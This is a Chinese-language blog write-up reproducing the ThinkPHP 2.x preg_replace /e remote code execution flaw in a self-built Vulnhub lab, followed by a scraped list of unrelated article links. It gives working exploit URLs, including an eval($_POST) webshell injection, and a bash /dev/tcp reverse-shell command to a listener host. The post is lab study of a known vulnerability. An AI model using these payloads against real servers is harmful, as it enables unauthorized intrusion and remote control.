当前位置: 首页 > article >正文

Php168代码执行漏洞,Vulnhub-ThinkPHP 2.x 任意代码执行漏洞

article 2025/8/21 22:47:16

郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。

漏洞简述

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

准备环境

测试机IP:192.168.79.129

靶机IP:192.168.79.131

1. 启动Vulnhub靶机环境:

34c4f74e9909

2. 验证靶机应用启用成功:

34c4f74e9909

漏洞复现

POC 引用:http://ip:8080/index.php?s=/index/index/name/${@phpinfo()}

34c4f74e9909

http://ip:8080/index.php?s=a/b/c/${@print(eval($_POST[1]))}

34c4f74e9909

准备反弹Shell文件shell.sh

bash -i >& /dev/tcp/192.168.79.129/4444 0>&1

启http server

34c4f74e9909

使用NC侦听反弹端口

34c4f74e9909

上传并执行反弹Shell文件

34c4f74e9909

得到反弹Shell

34c4f74e9909

关闭环境

34c4f74e9909

http://www.lryc.cn/news/2419046.html

相关文章:

  • 【转载】10个IT技术论坛
  • 高质量的子程序1
  • NXP JN5169使用代码模板新建外设工程
  • C# 反射(二)操作属性PropertyInfo
  • 基于 Chromium 的第三方浏览器一览
  • Android Kotlin 模块化清洁架构项目指南
  • sptd.sys不是病毒?
  • 网络工程专业主要要学习什么知识呢?
  • PropertyGrid控件由浅入深(二):基础用法
  • 《三国志14》运行提示kbdlt.dll丢失问题的详解解决策略
  • MyBatis foreach语句批量插入数据
  • 正则表达式之grep
  • spring学习之---spring整合Hibernate
  • IIS配置优化
  • 计算机基础入门1:计算机发展四阶段
  • 谷歌怎么搜索关键词
  • sql sever数据库出现恢复挂起的解决办法
  • 【原创】NES第二波:如何用VS Code,编写NES/FC游戏程序。
  • [gtalk]gtalk机器人
  • 时间序列分析:西安GDP 的 ARIMA 分析SAS操作过程(理论知识略)
  • 深入理解Linux内核-内存和磁盘-回收页框
  • 基于TP框架的PHP版本AI网址导航源码
  • SAP数据快速查询工具:Sqvi-QuickView
  • 133道Java面试题及答案(面试必看)
  • web画图技术(svg、canvas、fusioncharts、anychart)简介
  • 解决Jsoup 访问 https协议网站时产生connect reset错误
  • H.264编解码
  • 办公OA系统|基于SpringBoot+Vue实现银行OA系统的设计与实现
  • AssemblyInfo.cs文件的作用
  • Docker入门(二)Docker命令之镜像命令